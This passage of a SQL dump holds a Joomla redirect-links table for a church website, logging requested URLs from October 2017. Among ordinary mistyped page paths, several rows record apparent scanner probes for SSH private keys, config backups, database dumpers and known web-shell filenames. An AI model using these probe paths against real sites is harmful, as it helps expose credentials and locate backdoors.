(6872, 'https://www.lifeoasisinternationalchurch.org/wow2017/index.php/component/users/?view=reset', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 16, 0, '2017-10-12 03:18:10', '0000-00-00 00:00:00', 301),
(6873, 'https://www.lifeoasisinternationalchurch.org/media/breezingforms/themes/qmtheme/css-ec3d8f1364f747473fc0787fbf47d0fd.php', NULL, 'http://www.lifeoasisinternationalchurch.org/component/content/category/2-uncategorised', '', 7, 0, '2017-10-12 03:22:20', '0000-00-00 00:00:00', 301),
(6874, 'https://lifeoasisinternationalchurch.org/layouts/joomla/edit/info.php', NULL, 'http://lifeoasisinternationalchurch.org/layouts/joomla/edit/info.php', '', 3, 0, '2017-10-12 03:35:47', '0000-00-00 00:00:00', 301),
(6875, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 2, 0, '2017-10-12 04:28:49', '0000-00-00 00:00:00', 301),
(6876, 'https://lifeoasisinternationalchurch.org/mrswenvsr.php', NULL, 'http://lifeoasisinternationalchurch.org/mrswenvsr.php', '', 6, 0, '2017-10-12 05:25:04', '0000-00-00 00:00:00', 301),
(6877, 'https://www.spiritmeat.net/wow2017/', NULL, '', '', 1, 0, '2017-10-12 08:10:19', '0000-00-00 00:00:00', 301),
(6878, 'https://lifeoasisinternationalchurch.org/kup.php?u=1', NULL, '', '', 7, 0, '2017-10-12 11:36:42', '0000-00-00 00:00:00', 301),
(6879, 'https://lifeoasisinternationalchurch.org/networka/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/networka/popup-pomo.php', '', 8, 0, '2017-10-12 12:28:27', '0000-00-00 00:00:00', 301),
(6880, 'https://lifeoasisinternationalchurch.org/tplpage.php', NULL, 'http://lifeoasisinternationalchurch.org/tplpage.php', '', 2, 0, '2017-10-12 14:45:59', '0000-00-00 00:00:00', 301),
(6881, 'https://lifeoasisinternationalchurch.org/training-streaming', NULL, '', '', 1, 0, '2017-10-12 16:21:31', '0000-00-00 00:00:00', 301),
(6882, 'https://lifeoasisinternationalchurch.org/trainig', NULL, '', '', 6, 0, '2017-10-12 16:31:48', '0000-00-00 00:00:00', 301),
(6883, 'https://lifeoasisinternationalchurch.org/axmlprc.php', NULL, '', '', 8, 0, '2017-10-12 16:52:13', '0000-00-00 00:00:00', 301),
(6884, 'https://www.lifeoasisinternationalchurch.org/resources/download', NULL, '', '', 1, 0, '2017-10-12 17:00:42', '0000-00-00 00:00:00', 301),
(6885, 'https://www.lifeoasisinternationalchurch.org/resources/downl', NULL, '', '', 1, 0, '2017-10-12 17:00:44', '0000-00-00 00:00:00', 301),
(6886, 'https://www.lifeoasisinternationalchurch.org/re', NULL, '', '', 3, 0, '2017-10-12 17:00:48', '0000-00-00 00:00:00', 301),
(6887, 'https://www.lifeoasisinternationalchurch.org/ministries/outreach', NULL, '', '', 23, 0, '2017-10-13 02:33:33', '0000-00-00 00:00:00', 301),
(6888, 'https://lifeoasisinternationalchurch.org/about-us/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-10-13 02:54:25', '0000-00-00 00:00:00', 301),
(6889, 'https://www.lifeoasisinternationalchurch.org/bloggi.no/edwardoles', NULL, '', '', 2, 0, '2017-10-13 05:03:05', '0000-00-00 00:00:00', 301),
(6890, 'https://lifeoasisinternationalchurch.org/show.php?check=1', NULL, '', '', 7, 0, '2017-10-13 14:45:28', '0000-00-00 00:00:00', 301),
(6891, 'https://www.lifeoasisinternationalchurch.org/streamingtraining', NULL, '', '', 1, 0, '2017-10-13 20:59:21', '0000-00-00 00:00:00', 301),
(6892, 'https://www.lifeoasisinternationalchurch.org/privatestreaming/training', NULL, '', '', 4, 0, '2017-10-13 21:02:16', '0000-00-00 00:00:00', 301),
(6893, 'https://www.lifeoasisinternationalchurch.org/ytraining', NULL, '', '', 3, 0, '2017-10-13 21:12:18', '0000-00-00 00:00:00', 301),
(6894, 'https://www.lifeoasisinternationalchurch.org/private/pastral training', NULL, '', '', 1, 0, '2017-10-13 21:58:42', '0000-00-00 00:00:00', 301),
(6895, 'https://www.lifeoasisinternationalchurch.org/private/past0ral training', NULL, '', '', 2, 0, '2017-10-13 22:00:14', '0000-00-00 00:00:00', 301),
(6896, 'https://spiritmeat.net/t', NULL, '', '', 1, 0, '2017-10-14 05:42:19', '0000-00-00 00:00:00', 301),
(6897, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info/wimmp', NULL, '', '', 8, 0, '2017-10-14 11:20:45', '0000-00-00 00:00:00', 301),
(6898, 'https://lifeoasisinternationalchurch.org/bibleschool.html', NULL, '', '', 22, 0, '2017-10-14 15:31:06', '0000-00-00 00:00:00', 301),
(6899, 'https://lifeoasisinternationalchurch.org/loicforum/', NULL, 'https://lifeoasisinternationalchurch.org/loicforum/', '', 183, 0, '2017-10-14 15:34:14', '0000-00-00 00:00:00', 301),
(6900, 'https://www.lifeoasisinternationalchurch.org/18-loic/50-young-achievers', NULL, '', '', 13, 0, '2017-10-14 23:53:16', '0000-00-00 00:00:00', 301),
(6901, 'https://lifeoasisinternationalchurch.org/imdex.php', NULL, '', '', 4, 0, '2017-10-15 02:07:11', '0000-00-00 00:00:00', 301),
(6902, 'https://www.lifeoasisinternationalchurch.org/accordion-a/level-2', NULL, '', '', 6, 0, '2017-10-15 02:40:31', '0000-00-00 00:00:00', 301),
(6903, 'https://www.lifeoasisinternationalchurch.org/streaming3', NULL, '', '', 1, 0, '2017-10-15 03:03:08', '0000-00-00 00:00:00', 301),
(6904, 'https://www.lifeoasisinternationalchurch.org/streaming;', NULL, '', '', 4, 0, '2017-10-15 04:05:29', '0000-00-00 00:00:00', 301),
(6905, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/84942', NULL, '', '', 1, 0, '2017-10-15 09:13:59', '0000-00-00 00:00:00', 301),
(6906, 'https://www.lifeoasisinternationalchurch.org/resourvhmces/live-streaming', NULL, '', '', 1, 0, '2017-10-15 09:43:31', '0000-00-00 00:00:00', 301),
(6907, 'https://lifeoasisinternationalchurch.org/tmpe.php', NULL, '', '', 2, 0, '2017-10-15 12:43:39', '0000-00-00 00:00:00', 301),
(6908, 'https://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/', NULL, '', '', 11, 0, '2017-10-15 13:26:49', '0000-00-00 00:00:00', 301),
(6909, 'https://lifeoasisinternationalchurch.org/component/content/article/18-loic/35-trm', NULL, '', '', 2, 0, '2017-10-15 18:29:57', '0000-00-00 00:00:00', 301),
(6910, 'https://www.lifeoasisinternationalchurch.org/streamig', NULL, '', '', 2, 0, '2017-10-15 21:23:24', '0000-00-00 00:00:00', 301),
(6911, 'https://www.lifeoasisinternationalchurch.org/streaam', NULL, '', '', 1, 0, '2017-10-15 21:23:25', '0000-00-00 00:00:00', 301),
(6912, 'https://www.lifeoasisinternationalchurch.org/streaa', NULL, '', '', 1, 0, '2017-10-15 21:23:25', '0000-00-00 00:00:00', 301),
(6913, 'https://lifeoasisinternationalchurch.org/stre', NULL, '', '', 16, 0, '2017-10-16 01:54:41', '0000-00-00 00:00:00', 301),
(6914, 'https://lifeoasisinternationalchurch.org/stream', NULL, '', '', 32, 0, '2017-10-16 01:54:43', '0000-00-00 00:00:00', 301),
(6915, 'https://lifeoasisinternationalchurch.org/includes.php', NULL, '', '', 5, 0, '2017-10-16 02:24:39', '0000-00-00 00:00:00', 301),
(6916, 'https://www.lifeoasisinternationalchurch.org/loic/articles.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/articles.php', '', 17, 0, '2017-10-16 03:49:44', '0000-00-00 00:00:00', 301),
(6917, 'https://lifeoasisinternationalchurch.org/prayer.php', NULL, '', '', 13, 0, '2017-10-16 07:39:32', '0000-00-00 00:00:00', 301),
(6918, 'https://lifeoasisinternationalchurch.org/wp-pas.php', NULL, '', '', 4, 0, '2017-10-16 11:03:59', '0000-00-00 00:00:00', 301),
(6919, 'https://www.lifeoasisinternationalchurch.org/create-an-account.html', NULL, '', '', 1, 0, '2017-10-16 13:49:55', '0000-00-00 00:00:00', 301),
(6920, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/12', NULL, '', '', 2, 0, '2017-10-16 14:00:21', '0000-00-00 00:00:00', 301),
(6921, 'https://www.lifeoasisinternationalchurch.org/partnership/2-features/128-2017', NULL, '', '', 18, 0, '2017-10-16 17:05:26', '0000-00-00 00:00:00', 301),
(6922, 'https://www.lifeoasisinternationalchurch.org/2-features/128-2017', NULL, '', '', 27, 0, '2017-10-16 17:05:26', '0000-00-00 00:00:00', 301),
(6923, 'https://lifeoasisinternationalchurch.org/faith.php', NULL, '', '', 17, 0, '2017-10-16 20:15:34', '0000-00-00 00:00:00', 301),
(6924, 'https://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/', NULL, '', '', 2, 0, '2017-10-16 21:26:02', '0000-00-00 00:00:00', 301),
(6925, 'https://www.lifeoasisinternationalchurch.org/photogallery/', NULL, '', '', 5, 0, '2017-10-17 00:08:40', '0000-00-00 00:00:00', 301),
(6926, 'https://lifeoasisinternationalchurch.org/wp-main.php', NULL, '', '', 7, 0, '2017-10-17 01:17:44', '0000-00-00 00:00:00', 301),
(6927, 'https://www.lifeoasisinternationalchurch.org/contact.html', NULL, '', '', 15, 0, '2017-10-17 01:56:00', '0000-00-00 00:00:00', 301),
(6928, 'https://142.4.21.132//_asterisk/ultimatex.php', NULL, '', '', 2, 0, '2017-10-17 05:29:26', '0000-00-00 00:00:00', 301),
(6929, 'https://lifeoasisinternationalchurch.org/id_rsa', NULL, '', '', 44, 0, '2017-10-17 05:33:54', '0000-00-00 00:00:00', 301),
(6930, 'https://lifeoasisinternationalchurch.org/id_dsa', NULL, '', '', 44, 0, '2017-10-17 05:33:57', '0000-00-00 00:00:00', 301),
(6931, 'https://142.4.21.132//recordings/ultimatex.php', NULL, '', '', 2, 0, '2017-10-17 06:30:46', '0000-00-00 00:00:00', 301),
(6932, 'https://lifeoasisinternationalchurch.org/wp-checking.php', NULL, '', '', 7, 0, '2017-10-17 09:34:18', '0000-00-00 00:00:00', 301),
(6933, 'https://lifeoasisinternationalchurch.org/wpcache.php?_=1', NULL, '', '', 4, 0, '2017-10-17 12:25:18', '0000-00-00 00:00:00', 301),
(6934, 'https://www.lifeoasisinternationalchurch.org/id_rsa', NULL, '', '', 4, 0, '2017-10-17 16:06:22', '0000-00-00 00:00:00', 301),
(6935, 'https://www.lifeoasisinternationalchurch.org/id_dsa', NULL, '', '', 4, 0, '2017-10-17 16:06:24', '0000-00-00 00:00:00', 301),
(6936, 'https://www.lifeoasisinternationalchurch.org/l', NULL, '', '', 3, 0, '2017-10-17 20:36:56', '0000-00-00 00:00:00', 301),
(6937, 'https://www.lifeoasisinternationalchurch.org/liv', NULL, '', '', 2, 0, '2017-10-17 20:36:57', '0000-00-00 00:00:00', 301),
(6938, 'https://www.lifeoasisinternationalchurch.org/li', NULL, '', '', 6, 0, '2017-10-17 20:36:57', '0000-00-00 00:00:00', 301),
(6939, 'https://www.lifeoasisinternationalchurch.org/lives', NULL, '', '', 4, 0, '2017-10-17 20:36:59', '0000-00-00 00:00:00', 301),
(6940, 'https://www.lifeoasisinternationalchurch.org/livest', NULL, '', '', 3, 0, '2017-10-17 20:36:59', '0000-00-00 00:00:00', 301),
(6941, 'https://www.lifeoasisinternationalchurch.org/livestr', NULL, '', '', 2, 0, '2017-10-17 20:36:59', '0000-00-00 00:00:00', 301),
(6942, 'https://www.lifeoasisinternationalchurch.org/livestream', NULL, '', '', 19, 0, '2017-10-17 20:37:00', '0000-00-00 00:00:00', 301),
(6943, 'https://www.lifeoasisinternationalchurch.org/livestre', NULL, '', '', 2, 0, '2017-10-17 20:37:06', '0000-00-00 00:00:00', 301),
(6944, 'https://www.lifeoasisinternationalchurch.org/livestreamin', NULL, '', '', 2, 0, '2017-10-17 20:37:06', '0000-00-00 00:00:00', 301),
(6945, 'https://www.lifeoasisinternationalchurch.org/livestreami', NULL, '', '', 2, 0, '2017-10-17 20:37:06', '0000-00-00 00:00:00', 301),
(6946, 'https://www.lifeoasisinternationalchurch.org/livestrea', NULL, '', '', 5, 0, '2017-10-17 20:37:07', '0000-00-00 00:00:00', 301),
(6947, 'https://www.lifeoasisinternationalchurch.org/j-stuff', NULL, 'http://www.lifeoasisinternationalchurch.org/j-stuff', '', 3, 0, '2017-10-17 21:07:11', '0000-00-00 00:00:00', 301),
(6948, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/', NULL, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/', '', 14, 0, '2017-10-17 22:59:48', '0000-00-00 00:00:00', 301),
(6949, 'https://www.lifeoasisinternationalchurch.org/k2/itemlist/tag/', NULL, 'https://www.lifeoasisinternationalchurch.org/k2/itemlist/tag/', '', 2, 0, '2017-10-17 22:59:58', '0000-00-00 00:00:00', 301),
(6950, 'https://lifeoasisinternationalchurch.org/tra', NULL, '', '', 2, 0, '2017-10-18 06:22:39', '0000-00-00 00:00:00', 301),
(6951, 'https://lifeoasisinternationalchurch.org/trai', NULL, '', '', 3, 0, '2017-10-18 06:22:43', '0000-00-00 00:00:00', 301),
(6952, 'https://www.lifeoasisinternationalchurch.org/register&action=register', NULL, '', '', 1, 0, '2017-10-18 09:22:17', '0000-00-00 00:00:00', 301),
(6953, 'https://www.lifeoasisinternationalchurch.org/resources/\' + $href +', NULL, 'https://www.lifeoasisinternationalchurch.org/resources/downloads', '', 172, 0, '2017-10-18 09:32:58', '0000-00-00 00:00:00', 301),
(6954, 'https://lifeoasisinternationalchurch.org/ghfhvvaw.php', NULL, '', '', 6, 0, '2017-10-18 11:46:24', '0000-00-00 00:00:00', 301),
(6955, 'https://www.lifeoasisinternationalchurch.org/resources/father-s-heart', NULL, '', '', 40, 0, '2017-10-18 13:03:24', '0000-00-00 00:00:00', 301),
(6956, 'https://lifeoasisinternationalchurch.org/bgeiis.php', NULL, '', '', 5, 0, '2017-10-18 14:52:34', '0000-00-00 00:00:00', 301),
(6957, 'https://lifeoasisinternationalchurch.org/40thawc/alchurch.org/streaming', NULL, '', '', 2, 0, '2017-10-18 16:32:02', '0000-00-00 00:00:00', 301),
(6958, 'https://lifeoasisinternationalchurch.org/resources/\' + $href +', NULL, 'https://lifeoasisinternationalchurch.org/resources/downloads', '', 245, 0, '2017-10-18 19:24:07', '0000-00-00 00:00:00', 301),
(6959, 'https://lifeoasisinternationalchurch.org/component/k2/', NULL, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/Calling', '', 181, 0, '2017-10-18 19:37:51', '0000-00-00 00:00:00', 301),
(6960, 'https://lifeoasisinternationalchurch.org/backup.bak.php', NULL, '', '', 5, 0, '2017-10-18 20:35:05', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(6961, 'https://www.lifeoasisinternationalchurch.org/index.php/128-2014-6', NULL, '', '', 34, 0, '2017-10-18 21:33:32', '0000-00-00 00:00:00', 301),
(6962, 'https://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/10-preset-styles', NULL, '', '', 22, 0, '2017-10-18 21:44:09', '0000-00-00 00:00:00', 301),
(6963, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=remind&itemid=101', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 1150, 0, '2017-10-18 22:04:48', '0000-00-00 00:00:00', 301),
(6964, 'https://lifeoasisinternationalchurch.org/wp-cache.php', NULL, '', '', 9, 0, '2017-10-18 23:48:58', '0000-00-00 00:00:00', 301),
(6965, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 6, 0, '2017-10-19 01:33:44', '0000-00-00 00:00:00', 301),
(6966, 'https://lifeoasisinternationalchurch.org/tools/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/tools/popup-pomo.php', '', 17, 0, '2017-10-19 05:29:54', '0000-00-00 00:00:00', 301),
(6967, 'https://lifeoasisinternationalchurch.org/profile/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/profile/popup-pomo.php', '', 7, 0, '2017-10-19 06:22:28', '0000-00-00 00:00:00', 301),
(6968, 'https://prayer.lifeoasisinternationalchurch.org/wow2017/', NULL, '', '', 5, 0, '2017-10-19 08:35:58', '0000-00-00 00:00:00', 301),
(6969, 'https://lifeoasisinternationalchurch.org/themesa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/themesa/popup-pomo.php', '', 3, 0, '2017-10-19 14:26:51', '0000-00-00 00:00:00', 301),
(6970, 'https://lifeoasisinternationalchurch.org/wp-config_bak.php?x=1', NULL, '', '', 3, 0, '2017-10-19 17:07:08', '0000-00-00 00:00:00', 301),
(6971, 'https://www.lifeoasisinternationalchurch.org/login-register.html?view=registration', NULL, '', '', 1, 0, '2017-10-19 18:40:11', '0000-00-00 00:00:00', 301),
(6972, 'https://www.lifeoasisinternationalchurch.org/community/registro', NULL, '', '', 1, 0, '2017-10-19 20:05:16', '0000-00-00 00:00:00', 301),
(6973, 'https://www.lifeoasisinternationalchurch.org/component/k2/', NULL, 'https://www.lifeoasisinternationalchurch.org/component/k2/', '', 22, 0, '2017-10-19 22:09:27', '0000-00-00 00:00:00', 301),
(6974, 'https://www.lifeoasisinternationalchurch.org/k2/', NULL, 'https://www.lifeoasisinternationalchurch.org/k2/', '', 10, 0, '2017-10-19 22:09:29', '0000-00-00 00:00:00', 301),
(6975, 'https://lifeoasisinternationalchurch.org/content-post.php', NULL, 'http://lifeoasisinternationalchurch.org/content-post.php', '', 7, 0, '2017-10-19 22:16:07', '0000-00-00 00:00:00', 301),
(6976, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun', NULL, '', '', 11, 0, '2017-10-19 23:44:13', '0000-00-00 00:00:00', 301),
(6977, 'https://lifeoasisinternationalchurch.org/revisiona/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/revisiona/popup-pomo.php', '', 4, 0, '2017-10-20 01:59:36', '0000-00-00 00:00:00', 301),
(6978, 'https://lifeoasisinternationalchurch.org/ssegtj/map.php', NULL, 'http://lifeoasisinternationalchurch.org/ssegtj/map.php', '', 2, 0, '2017-10-20 02:44:31', '0000-00-00 00:00:00', 301),
(6979, 'https://lifeoasisinternationalchurch.org/baws.php', NULL, 'http://lifeoasisinternationalchurch.org/baws.php', '', 10, 0, '2017-10-20 04:30:40', '0000-00-00 00:00:00', 301),
(6980, 'https://lifeoasisinternationalchurch.org/dumper.php', NULL, '', '', 2, 0, '2017-10-20 06:15:49', '0000-00-00 00:00:00', 301),
(6981, 'https://lifeoasisinternationalchurch.org/dumper/dumper.php', NULL, '', '', 2, 0, '2017-10-20 06:15:51', '0000-00-00 00:00:00', 301),
(6982, 'https://lifeoasisinternationalchurch.org/menusa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/menusa/popup-pomo.php', '', 7, 0, '2017-10-20 06:59:18', '0000-00-00 00:00:00', 301),
(6983, 'https://lifeoasisinternationalchurch.org/wp-includse.php?script=1', NULL, '', '', 5, 0, '2017-10-20 07:52:56', '0000-00-00 00:00:00', 301),
(6984, 'https://lifeoasisinternationalchurch.org/f397b/hopeir/map.php', NULL, 'http://lifeoasisinternationalchurch.org/f397b/hopeir/map.php', '', 1, 0, '2017-10-20 11:30:55', '0000-00-00 00:00:00', 301),
(6985, 'https://www.lifeoasisinternationalchurch.org/home/register', NULL, '', '', 1, 0, '2017-10-20 13:44:57', '0000-00-00 00:00:00', 301),
(6986, 'https://lifeoasisinternationalchurch.org/missok.php?x=1', NULL, '', '', 5, 0, '2017-10-20 14:04:18', '0000-00-00 00:00:00', 301),
(6987, 'https://lifeoasisinternationalchurch.org/wow2017/administrator/', NULL, '', '', 1, 0, '2017-10-20 15:21:14', '0000-00-00 00:00:00', 301),
(6988, 'https://lifeoasisinternationalchurch.org/awc2017/administrator/', NULL, '', '', 1, 0, '2017-10-20 15:21:21', '0000-00-00 00:00:00', 301),
(6989, 'https://www.lifeoasisinternationalchurch.org/index.php/images/demo/video/envato_sting.mp4', NULL, '', '', 2, 0, '2017-10-20 16:14:32', '0000-00-00 00:00:00', 301),
(6990, 'https://lifeoasisinternationalchurch.org/pressthisa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/pressthisa/popup-pomo.php', '', 6, 0, '2017-10-20 16:47:06', '0000-00-00 00:00:00', 301),
(6991, 'https://lifeoasisinternationalchurch.org/usi.php', NULL, 'http://lifeoasisinternationalchurch.org/usi.php', '', 5, 0, '2017-10-20 16:48:08', '0000-00-00 00:00:00', 301),
(6992, 'https://lifeoasisinternationalchurch.org/widgetsa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/widgetsa/popup-pomo.php', '', 3, 0, '2017-10-20 17:00:15', '0000-00-00 00:00:00', 301),
(6993, 'https://lifeoasisinternationalchurch.org/license.php', NULL, '', '', 69, 0, '2017-10-20 17:16:48', '0000-00-00 00:00:00', 301),
(6994, 'https://lifeoasisinternationalchurch.org/resource/streaming', NULL, '', '', 1, 0, '2017-10-20 18:08:28', '0000-00-00 00:00:00', 301),
(6995, 'https://lifeoasisinternationalchurch.org/templates/beez3/css/marvins.php', NULL, 'http://lifeoasisinternationalchurch.org/templates/beez3/css/Marvins.php', '', 2, 0, '2017-10-20 18:38:37', '0000-00-00 00:00:00', 301),
(6996, 'https://lifeoasisinternationalchurch.org/templates/beez3/css/marvins.php', NULL, 'http://lifeoasisinternationalchurch.org/templates/beez3/css/Marvins.php', '', 1, 0, '2017-10-20 18:38:37', '0000-00-00 00:00:00', 301),
(6997, 'https://lifeoasisinternationalchurch.org/feeds', NULL, '', '', 2, 0, '2017-10-20 20:12:24', '0000-00-00 00:00:00', 301),
(6998, 'https://lifeoasisinternationalchurch.org/docs/map.php', NULL, 'http://lifeoasisinternationalchurch.org/docs/map.php', '', 1, 0, '2017-10-20 21:52:37', '0000-00-00 00:00:00', 301),
(6999, 'https://lifeoasisinternationalchurch.org/error-logs.php', NULL, '', '', 4, 0, '2017-10-20 23:18:56', '0000-00-00 00:00:00', 301),
(7000, 'https://www.lifeoasisinternationalchurch.org/createaccount&returnto=user', NULL, '', '', 1, 0, '2017-10-20 23:49:29', '0000-00-00 00:00:00', 301),
(7001, 'https://www.lifeoasisinternationalchurch.org/user-profile?view=registration', NULL, '', '', 3, 0, '2017-10-20 23:50:52', '0000-00-00 00:00:00', 301),
(7002, 'https://www.lifeoasisinternationalchurch.org/register', NULL, '', '', 1, 0, '2017-10-21 00:54:09', '0000-00-00 00:00:00', 301),
(7003, 'https://www.lifeoasisinternationalchurch.org/site/index.php?option=com_users&view=registration', NULL, '', '', 1, 0, '2017-10-21 01:01:58', '0000-00-00 00:00:00', 301),
(7004, 'https://lifeoasisinternationalchurch.org/bin/map.php', NULL, 'http://lifeoasisinternationalchurch.org/bin/map.php', '', 4, 0, '2017-10-21 01:29:53', '0000-00-00 00:00:00', 301),
(7005, 'https://www.lifeoasisinternationalchurch.org/user/register', NULL, '', '', 3, 0, '2017-10-21 04:08:14', '0000-00-00 00:00:00', 301),
(7006, 'https://lifeoasisinternationalchurch.org/post.php', NULL, '', '', 5, 0, '2017-10-21 05:04:34', '0000-00-00 00:00:00', 301),
(7007, 'https://www.lifeoasisinternationalchurch.org/live streaming', NULL, '', '', 74, 0, '2017-10-21 08:12:23', '0000-00-00 00:00:00', 301),
(7008, 'https://www.lifeoasisinternationalchurch.org/using-joomla/extensions/components/users-component/registration-form', NULL, '', '', 4, 0, '2017-10-21 09:33:17', '0000-00-00 00:00:00', 301),
(7009, 'https://shop.lifeoasisinternationalchurch.org/wp/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-21 22:43:36', '0000-00-00 00:00:00', 301),
(7010, 'https://solaareogunministires.org/wp/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-21 22:43:36', '0000-00-00 00:00:00', 301),
(7011, 'https://solaareogunministires.org/blog/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-21 22:43:36', '0000-00-00 00:00:00', 301),
(7012, 'https://shop.lifeoasisinternationalchurch.org/blog/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-21 22:43:36', '0000-00-00 00:00:00', 301),
(7013, 'https://shop.lifeoasisinternationalchurch.org/old/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-21 22:43:39', '0000-00-00 00:00:00', 301),
(7014, 'https://solaareogunministires.org/old/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-21 22:43:39', '0000-00-00 00:00:00', 301),
(7015, 'https://solaareogunministires.org/test/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-21 22:43:42', '0000-00-00 00:00:00', 301),
(7016, 'https://shop.lifeoasisinternationalchurch.org/test/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-10-21 22:43:42', '0000-00-00 00:00:00', 301),
(7017, 'https://lifeoasisinternationalchurch.org/vision.php', NULL, '', '', 26, 0, '2017-10-22 01:20:25', '0000-00-00 00:00:00', 301),
(7018, 'https://lifeoasisinternationalchurch.org/prayer/58-prophetic-words-for-day-6', NULL, '', '', 2, 0, '2017-10-22 05:13:04', '0000-00-00 00:00:00', 301),
(7019, 'https://lifeoasisinternationalchurch.org/index.php?option=com_easyblog&view=latest', NULL, 'https://lifeoasisinternationalchurch.org', '', 8, 0, '2017-10-22 07:44:01', '0000-00-00 00:00:00', 301),
(7020, 'https://lifeoasisinternationalchurch.org/prayer.html', NULL, '', '', 6, 0, '2017-10-22 08:52:10', '0000-00-00 00:00:00', 301),
(7021, 'https://lifeoasisinternationalchurch.org/live.php', NULL, '', '', 28, 0, '2017-10-22 11:04:00', '0000-00-00 00:00:00', 301),
(7022, 'https://www.lifeoasisinternationalchurch.org/feed', NULL, '', '', 2, 0, '2017-10-22 12:37:23', '0000-00-00 00:00:00', 301),
(7023, 'https://www.lifeoasisinternationalchurch.org/rss', NULL, '', '', 2, 0, '2017-10-22 12:37:24', '0000-00-00 00:00:00', 301),
(7024, 'https://www.lifeoasisinternationalchurch.org/feeds', NULL, '', '', 1, 0, '2017-10-22 12:37:25', '0000-00-00 00:00:00', 301),
(7025, 'https://www.lifeoasisinternationalchurch.org/message.html', NULL, '', '', 9, 0, '2017-10-22 20:56:56', '0000-00-00 00:00:00', 301),
(7026, 'https://lifeoasisinternationalchurch.org/index.php?option=com_foxcontact', NULL, '', '', 6, 0, '2017-10-22 21:01:27', '0000-00-00 00:00:00', 301),
(7027, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?sermon_cat=21&limitstart=0', NULL, '', '', 2, 0, '2017-10-22 22:07:07', '0000-00-00 00:00:00', 301),
(7028, 'https://www.lifeoasisinternationalchurch.org/gobc/reserve/download', NULL, '', '', 2, 0, '2017-10-23 03:42:21', '0000-00-00 00:00:00', 301),
(7029, 'https://www.lifeoasisinternationalchurch.org/our-gallery', NULL, '', '', 16, 0, '2017-10-23 04:20:20', '0000-00-00 00:00:00', 301),
(7030, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info-2/the-church-2', NULL, '', '', 7, 0, '2017-10-23 06:47:08', '0000-00-00 00:00:00', 301),
(7031, 'https://www.lifeoasisinternationalchurch.org/media.php', NULL, '', '', 11, 0, '2017-10-23 09:27:08', '0000-00-00 00:00:00', 301),
(7032, 'https://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/5-menu-options', NULL, '', '', 8, 0, '2017-10-23 11:01:57', '0000-00-00 00:00:00', 301),
(7033, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/18', NULL, '', '', 2, 0, '2017-10-23 15:56:17', '0000-00-00 00:00:00', 301),
(7034, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/7', NULL, '', '', 2, 0, '2017-10-24 11:13:05', '0000-00-00 00:00:00', 301),
(7035, 'https://142.4.21.132/elastix_warning_authentication.php', NULL, '', '', 1, 0, '2017-10-25 10:13:07', '0000-00-00 00:00:00', 301),
(7036, 'https://lifeoasisinternationalchurch.org/sites/all/libraries/elfinder/elfinder.html', NULL, 'http://lifeoasisinternationalchurch.org/sites/all/libraries/elfinder/elfinder.html', '', 2, 0, '2017-10-26 04:11:17', '0000-00-00 00:00:00', 301),
(7037, 'https://www.lifeoasisinternationalchurch.org/sites/all/libraries/elfinder/elfinder.html', NULL, 'http://www.lifeoasisinternationalchurch.org/sites/all/libraries/elfinder/elfinder.html', '', 2, 0, '2017-10-26 08:05:12', '0000-00-00 00:00:00', 301),
(7038, 'https://lifeoasisinternationalchurch.org/index.php?option=com_contentview=articleid=97itemid=773check', NULL, '', '', 1, 0, '2017-10-26 20:51:37', '0000-00-00 00:00:00', 301),
(7039, 'https://lifeoasisinternationalchurch.org/media/com_acymailing/css/css-65194', NULL, '', '', 1, 0, '2017-10-26 21:59:30', '0000-00-00 00:00:00', 301),
(7040, 'https://lifeoasisinternationalchurch.org/index.php?option=com_contentview=articleid=97itemid=773img', NULL, '', '', 1, 0, '2017-10-26 22:04:04', '0000-00-00 00:00:00', 301),
(7041, 'https://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&itemid=189', NULL, '', '', 1, 0, '2017-10-26 22:04:11', '0000-00-00 00:00:00', 301),
